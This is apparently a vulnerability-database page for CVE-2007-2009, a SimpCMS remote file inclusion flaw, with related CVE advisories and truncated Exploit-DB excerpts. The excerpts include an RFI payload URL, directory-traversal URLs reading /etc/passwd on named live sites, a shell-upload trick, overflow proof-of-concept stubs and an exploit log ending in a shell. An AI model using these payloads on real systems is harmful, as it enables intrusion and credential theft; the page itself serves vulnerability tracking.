CVE-2007-2009
Published: 2007-04-12
Priority: P339 · Severity: medium · CVSS 2.0 base score: 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 2.83% (84.9th percentile)
PHP remote file inclusion vulnerability in index.php in SimpCMS Light 04.10.2007 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the site parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| simpcms | simpcms | — | — |
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
| vendor_redhat | — | 6.8 | MEDIUM | — |
GHSA
GHSA-8phr-7r8f-j385 (CVE-2007-2009) [MEDIUM]: PHP remote file inclusion vulnerability in index.php
ghsa_unreviewed · 2022-05-01
PHP remote file inclusion vulnerability in index.php in SimpCMS Light 04.10.2007 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the site parameter.
Kernel
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security · 2018-08-23 · CVSS 7.2
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
Citrix
CVE-2010-4515 [MEDIUM] CWE-79: Cross-site scripting (XSS) vulnerability in Citrix Web Interface 5.0, 5.1, and 5.3
vendor_citrix · 2010-12-09 · CVSS 4.3
CVE-2010-4515: Cross-site scripting (XSS) vulnerability in Citrix Web Interface 5.0, 5.1, and 5.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2007-6477 and CVE-2009-2454.
Red Hat
CVE-2009-4136 [MEDIUM] postgresql: SQL privilege escalation via modifications to session-local state
vendor_redhat · 2009-12-14 · CVSS 6.5
PostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before 8.4.2 does not properly manage session-local state during execution of an index function by a database superuser, which allows remote authenticated users to gain privileges via a table with crafted index functions, as demonstrated by functions that modify (1) search_path or (2) a prepared statement, a related issue to CVE-2007-6600 and CVE-2009-3230.
Red Hat
CVE-2009-3885 [MEDIUM] OpenJDK BMP parsing DoS with UNC ICC links (6632445)
vendor_redhat · 2009-11-03 · CVSS 4.3
Sun Java SE 5.0 before Update 22 and 6 before Update 17 on Windows allows remote attackers to cause a denial of service via a BMP file containing a link to a UNC share pathname for an International Color Consortium (ICC) profile file, probably a related issue to CVE-2007-2789, aka Bug Id 6632445.
Red Hat
CVE-2009-3230 [MEDIUM] postgresql: SQL privilege escalation, incomplete fix for CVE-2007-6600
vendor_redhat · 2009-09-09 · CVSS 6.5
The core server component in PostgreSQL 8.4 before 8.4.1, 8.3 before 8.3.8, 8.2 before 8.2.14, 8.1 before 8.1.18, 8.0 before 8.0.22, and 7.4 before 7.4.26 does not use the appropriate privileges for the (1) RESET ROLE and (2) RESET SESSION AUTHORIZATION operations, which allows remote authenticated users to gain privileges. NOTE: this is due to an incomplete fix for CVE-2007-6600.
Red Hat
CVE-2009-1789 [MEDIUM] eggdrop DoS (crash)
vendor_redhat · 2009-05-26 · CVSS 6.8
mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and earlier allows remote attackers to cause a denial of service (crash) via a crafted PRIVMSG that causes an empty string to trigger a negative string length copy. NOTE: this issue exists because of an incorrect fix for CVE-2007-2807.
Red Hat
CVE-2009-0362 [MEDIUM] fail2ban: remote DoS via crafted domain names
vendor_redhat · 2009-02-04 · CVSS 6.8
filter.d/wuftpd.conf in Fail2ban 0.8.3 uses an incorrect regular expression that allows remote attackers to cause a denial of service (forced authentication failures) via a crafted reverse-resolved DNS name (rhost) entry that contains a substring that is interpreted as an IP address, a different vulnerability than CVE-2007-4321.
Red Hat
CVE-2009-2697 [MEDIUM] gdm not built with tcp_wrappers
vendor_redhat · 2007-05-11 · CVSS 6.0
The Red Hat build script for the GNOME Display Manager (GDM) before 2.16.0-56 on Red Hat Enterprise Linux (RHEL) 5 omits TCP Wrapper support, which might allow remote attackers to bypass intended access restrictions via XDMCP connections, a different vulnerability than CVE-2007-5079.
Red Hat
CVE-2007-2348 [MEDIUM] lftp mirror --script does not escape names and targets of symbolic links
vendor_redhat · 2007-01-09 · CVSS 6.8
mirror --script in lftp before 3.5.9 does not properly quote shell metacharacters, which might allow remote user-assisted attackers to execute shell commands via a malicious script. NOTE: it is not clear whether this issue crosses security boundaries, since the script already supports commands such as "get" which could overwrite executable files.
Statement: This issue does not affect lftp as supplied with Red Hat Enterprise Linux 3.
This issue was addressed for Red Hat Enterprise Linux 5 by
https://rhn.redhat.com/errata/RHSA-2009-1278.html
The Red Hat Security Response Team has rated this issue as having low security impact; this issue will not be fixed in Red Hat Enterprise Linux 4.
Package: lftp (Red Hat Enterprise
No detection rules found.
Exploit-DB
CVE-2009-3129 [HIGH] Microsoft Excel - FEATHEADER Record (MS09-067)
exploitdb · 2010-08-21 · CVSS 7.8
---
#MS Excel Malformed FEATHEADER Record Exploit
#CVE-2009-3129, MS09-067, OSVDB-59860
#Vulnerable application MS Office 2003/2007
#Tested on XP SP2 - MS Office 2003 v. 11.5604.5606
#Sean Larsson - Original Discovery
#!/usr/bin/python
import sys
import zlib
#Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes by RubberDuck =)
Exploit-DB
CVE-2009-4822: Kasseler CMS 2.0.5 - Bypass / Download Backup
exploitdb · 2010-04-26
---
| # Title : kasseler cms 2.0.5 => by Pass / Download Backup Vulnerability
| # Author : indoushka
| # email : [email protected]
| # Dork : Copyright ©2007-2009 by Kasseler CMS. All rights reserved.
| # Tested on: windows SP2 Français V.(Pnx2 2.0)
| # Bug : Backup
====================== Exploit By indoushka =================================
# Exploit :
1 - http://127.0.0.1/kasseler/backup.php
File size: 37.38 KB
Tables processed: 39
Rows processed: 37
2 - http://127.0.0.1/uploads/backup/auto_2010-04-27_14-29.sql
At lines 645:668, column 1, you find the login information
INSERT INTO `kasseler_users` VALUES
(-1, 'guest', 'Guest', '', '', 'default.png', '0000-00-00 00:00:00', 'default', 0, '', '', '', '', '', 5, '', '0', '', '0000-00-00 00
Exploit-DB
CVE-2010-1225: Virtual PC Hypervisor - Memory Protection
exploitdb · 2010-03-17
---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Virtual PC Hypervisor Memory Protection Vulnerability
1. *Advisory Information*
Title: Virtual PC Hypervisor Memory Protection Vulnerability
Advisory Id: CORE-2009-0803
Advisory URL:
http://www.coresecurity.com/content/virtual-pc-2007-hypervisor-memory-protection-bug
Date published: 2010-03-16
Date of last update: 2010-03-16
Vendors contacted: Microsoft
Release mode: User release
2. *Vulnerability Information*
Class: Improper Access Control [CWE-285]
Impact: Security bypass
Remotely Exploitable: No
Locally Exploitable: Yes
Bugtraq ID: 38764
CVE Name: N/A
3. *Vulnerability Description*
Windows Virtual PC
Exploit-DB
CVE-2007-6166: Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow
exploitdb · 2010-01-06
---
# Exploit Title: Apple QuickTime 7.2/7.3 RTSP BOF (Perl)
# Date: 2009-01-06
# Author: Jacky
# Software Link: [download link if available]
# Version: 7.2/7.3
# Tested on: Windows XP SP3
# CVE : [if exists]
# Code :
#Apple QuickTime 7.2/7.3 RTSP BOF (Perl Edition )
#Discovered by (Krystian Kloskowski (h07) )
#Written and coded by Jacky!
#All Greetz to Peter Van Eeckhoutte and Corelan Team ( Best exploitation team);-)
#This time i wrote the exploit in perl , because i saw that it was written
#many times in python and ruby only !
#This exploit is for EDUCATIONAL PURPOSES ONLY !!!
#!/usr/bin/perl -w
# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n
#
# 0x41414141 Pointer to next SEH record
# 0x42424242 SE handler
use strict;
use Socket;
my $ju
Exploit-DB
CVE-2007-4527: phUploader 2 - Arbitrary File Upload
exploitdb · 2009-12-20
---
# Exploit Title: phUploader Remote File Upload Vulnerability
# Date: 20-12-2009
# Author: wlhaan-hacker
#
# Version: v2
# CVE : [N/A]
~ Script Name : phUploader)
~ Language : php
~
~ email: [email protected]
~
Dork : Powered By phUploader
Exploit :
http://{target}/script path/upload.php
Change shell
shell.php.flac
go to shell
http://{target}/script path/uploads/shell.php.flac
Exploit video
Download:
http://filaty.com/f/912/99431/up5.rar.html
thank you for
shooq hacker
www.sa-hacker.com/vb
Exploit-DB
CVE-2007-0518: Smart PHP Subscriber - Multiple Disclosure Vulnerabilities
exploitdb · 2009-12-14
---
[#-----------------------------------------------------------------------------------------------#]
[#] Title: Smart PHP Subscriber Multiple Disclosure Vulnerabilities
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 14. December 2009.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: Smart PHP Subscriber
[#] Version: the only one there is
[#] Platform: PHP
[#] Vulnerability: Multiple Disclosure Vulnerabilities
[#-----------------------------------------------------------------------------------------------#]
[#]Content
|--Admin password disclosure
|--Subscribers list disclosure
[*]Admin password disclosure
Admin password is sav
Exploit-DB
CVE-2009-3586 [CRITICAL] CoreHTTP Web server 0.5.3.1 - Off-by-One Buffer Overflow
exploitdb · 2009-12-02 · CVSS 9.0
---
# bugtraq: http://seclists.org/bugtraq/2009/Dec/99
# census ID: census-2009-0003
# URL: http://census-labs.com/news/2009/12/02/corehttp-web-server/
# CVE ID: CVE-2009-3586
# Affected Products: CoreHTTP web server versions buffer,
# 46: "%" PATHSIZE_S "[A-Za-z] %" PATHSIZE_S "s%*[ \t\n]", req, url);
#
# The buffers req and url are declared to be of size 256 bytes (PATHSIZE)
# and the sscanf() call writes 256 bytes (PATHSIZE_S) to these buffers
# without NULL terminating them.
#
# Note that this is not vulnerability CVE-2007-4060 in which the same
# sscanf() call contained no bounds check at all.
#
# This vulnerability can lead to denial of service attacks against the
# CoreHTTP web server and potentially to the remote execution
Exploit-DB
CVE-2009-4781: TEKUVA - Password Reminder Authentication Bypass
exploitdb · 2009-11-21
---
#!/usr/bin/perl
# Exploit: TEKUVA Password Reminder Authentication Bypass
# Date: [11/19/2009]
# Author: iqlusion [[email protected]]
# Software Link: http://download.cnet.com/Password-Reminder/3000-2064_4-10966598.html
# Version: 1.0.0.1
# Info: TEKUVA Password Reminder is a password vault that allows you to store all
# your credentials in one spot and all you have to remember is a single 'main'
# password to access your vault. Unfortunately, the vault is actually an
# Access 2007 database that is protected by a password which is hard coded into
# the program, not your main password.
#
# This script connects to the database using the hard coded db password and dumps
# everything into an HTML table, bypassing the need to enter th
Exploit-DB
CVE-2009-3904: CubeCart 4 - Session Management Bypass
exploitdb · 2009-10-30
---
CubeCart 4 Session Management Bypass
Release Date: 2009/10/29
Author: Bogdan Calin (bogdan [at] acunetix [dot] com)
Severity: Critical
Vendor Status: Vendor has released an updated version
I. Background
From Wikipedia: CubeCart is a free-to-use eCommerce software solution,
designed to allow individuals and businesses sell tangible and digital
goods on line.
CubeCart is not Open Source software, although full source code is
available at no cost, and the custom licensing model allows for
customisation of the code.
...
CubeCart has developed a large fanbase, due in part, to the relative
ease of creating modifications and enhancements.
In the September/October 2007 issue of Practical eCommerce magazine,
CubeCart was placed at #1 in their list of
Exploit-DB
CVE-2009-3830: SharePoint 2007 - Team Services Source Code Disclosure
exploitdb · 2009-10-26
---
Summary
Name: SharePoint Team Services source code disclosure through download
facility
Release Date: 21 October 2009
Reference: NGS00532
Discover: Daniel Martin
Vendor: Microsoft
Systems Affected: SharePoint 2007 (12.0.0.6219, 12.0.0.4518 and
possibly others)
Risk: Medium
Status: Reported
TimeLine
Discovered: 17 September 2008
Released: 2 October 2008
Approved: 3 October 2008
Reported: 8 October 2008
Fixed:
Published: 23 October 2009
Description
Microsoft SharePoint is a browser-based collaboration and document
management platform. It can be used to host web sites that access shared
workspaces and documents, as well as specialized applications like wikis
and blogs from a browser.
It was found that the download facility of Mic
Exploit-DB
CVE-2009-3318: Joomla! Component com_album 1.14 - Directory Traversal
exploitdb · 2009-09-17
---
Joomla Component com_album Directory Traversal Vuln (version Album #1.14 )
# Author : DreamTurk
# mail : [email protected]
# home page : www.turkguvenligi.info
Down : http://www.breedveld.net/index.php?option=com_remository&Itemid=193&func=startdown&id=1
exp : http://localhost/index.php?option=com_album&Itemid=128&target=/../..
# gretZ : aLL My Friends & turkguvenligi.info Members & t4cs1zkr4L
note:
Album
23-05-2007
Roland Breedveld
This component is released under the GNU/GPL License
[email protected]
Breedveld.net
1.14
Album Component For Joomla/str0ke
# milw0rm.com [2009-09-17]
Exploit-DB
CVE-2009-2015: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
exploitdb · 2009-06-08
---
Joomla Component MooFAQ Local File Inclusion Vulnerability
###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Vulnerability : LFI
###################################################
Example:
http://localHost/path/components/com_moofaq/includes/file_includer.php?gzip=0&file=[LFI]
Demo Live (1):
http://www.paginaswebhonduras.com/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
Demo Live (2):
http://www.uers.gov.do/components/com_moofaq/includes/file_includer.php?gzip=0&file=/etc/passwd
++++++++++++++++++++++++++++++++
[!] Produced in South America
FAQ Component using mooTools
20 July 2007
1.0
1.0.13
Douglas
Exploit-DB
CVE-2007-3542: Pluxml 0.3.1 - Remote Code Execution
exploitdb · 2007-06-24
---
sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196
# [/]Waiting for connection on http://90.27.10.196:80/
# [!]Now you have to make the victim to click on the url
# [+]Received 395 bytes from 182.26.54.2:2007
# [+]Sending 366 bytes to 182.26.54.2:2007
# [+]Received 326 bytes from 182.26.54.2:2009
# [+]Sending 366 bytes to 182.26.54.2:2009
# [+]Received 692 bytes from 182.26.54.2:2010
# [!]Received one cookie from 182.26.54.2:2010
# [/]Verifying if there is a valid session id cookie
# [-]No: pollvote=1
# [!]Yes: PHPSESSID=c6255827c1a07c51a95af691a612484b
# [+]The created socket has been shut down
# $shell> whoami
# darkfig
#
if($argc
URL: acid-root.new.fr || mgsdl.free.fr
IRC: #[email protected]
Note: Coded for fun 8)
Usage: $a
Exploit-DB
CVE-2009-3967: GDivX Zenith Player AviFixer Class - 'fix.dll 1.0.0.1' Buffer Overflow (PoC)
exploitdb · 2007-05-09
---
' IE 6 / GDivX Zenith Player AviFixer Class (fix.dll v. 1.0.0.1) buffer overflow POC by rgod
' tested on xp sp2
EIP= "BBBB"
BOF=String(264, "A") + EIP + String(9999, unescape("%90"))
target.SetInputFile BOF
# milw0rm.com [2007-05-09]
Exploit-DB
CVE-2007-2009: SimpCMS 04.10.2007 - 'site' Remote File Inclusion
exploitdb · 2007-04-10
---
Bug Found By Dr.RoVeR -->Arab48 Hacker
Contact: [email protected]
---
Script: SimpCMS Light
Download: http://www.simpcms.com/light/normal/simp-cms-light.zip
--
Bug File: index.php
Bug code in line 31:
include $site.".php";
--
Exploit:
http://site.com/[path]/index.php?site=[EvilScript]
# milw0rm.com [2007-04-10]
Bugzilla
CVE-2007-4567 [HIGH] kernel: ipv6_hop_jumbo remote system crash
bugzilla · 2009-12-18 · CVSS 7.8
It was originally discovered by Victor Julien that there is a way to crash the Linux kernel by sending a single IPv6 packet at it.
1) The CVE-2007-4567 issue was reported to Red Hat in September 2007. Red Hat Enterprise Linux 5 was found not to be affected.
2) On December 18, 2009, a customer reported to us that Red Hat Enterprise Linux 5 was vulnerable to CVE-2007-4567.
3) Investigations showed that the issue was introduced in the RHBA-2008-0314 update on May 21, 2008 via a backport of a collection of patches for DoD IPv6 conformance.
4) Updates released on January 7, 2010 for Red Hat Enterprise Linux 5, resolving CVE-2007-4567.
Note that the Linux kernels as shipped with Red Hat Enterprise Linux 3, 4, and Red Hat Enterprise MRG are
Bugzilla
CVE-2009-1789 [MEDIUM] eggdrop DoS (crash)
bugzilla · 2009-05-26 · CVSS 6.8
mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and
earlier allows remote attackers to cause a denial of service (crash)
via a crafted PRIVMSG that causes an empty string to trigger a
negative string length copy. NOTE: this issue exists because of an
incorrect fix for CVE-2007-2807.
http://secunia.com/advisories/35104
Discussion:
Created eggdrop tracking bugs for this issue
CVE-2009-1789 Affects: F10 [bug #502651]
CVE-2009-1789 Affects: F8 [bug #502652]
CVE-2009-1789 Affects: F9 [bug #502653]
CVE-2009-1789 Affects: Fdevel [bug #502654]
---
The upstream fix should be here:
http://cvs.eggheads.org/viewvc/viewvc.cgi/eggdrop1.6/src/mod/server.mod/servmsg.c?r1=1.100&r2=1.101
---
Package: eggdrop-1.6.19-4.fc12 Tag: dist-f12 Status: compl
Bugzilla
CVE-2009-1284 [MEDIUM] tetex, texlive: bibtex's invalid reads/writes when parsing big *.bib file
bugzilla · 2009-03-25 · CVSS 5.0
A security flaw was found in bibtex, a tool for preparing bibliographies for
(La)TeX. An attacker could use this flaw to cause a denial of
service (application crash), or possibly cause memory corruption, by
providing a big *.bib bibliography file for processing with the bibtex
tool.
References:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=520920
Discussion:
Created attachment 336659
Reproducer
Scenario:
1, Untar provided archive
2, bibtex livre_fp.aux
---
This issue affects all versions of the tetex package, as shipped
with Red Hat Enterprise Linux 2.1, 3, 4, and 5.
This issue affects all versions of the texlive-2007 package, as shipped
with Fedora releases of 9, 10, and devel.
---
It seem
References
http://secunia.com/advisories/24851
http://www.attrition.org/pipermail/vim/2007-April/001513.html
http://www.securityfocus.com/archive/1/465343/100/100/threaded
http://www.securityfocus.com/bid/23439
http://www.vupen.com/english/advisories/2007/1348
https://exchange.xforce.ibmcloud.com/vulnerabilities/33572
https://www.exploit-db.com/exploits/3705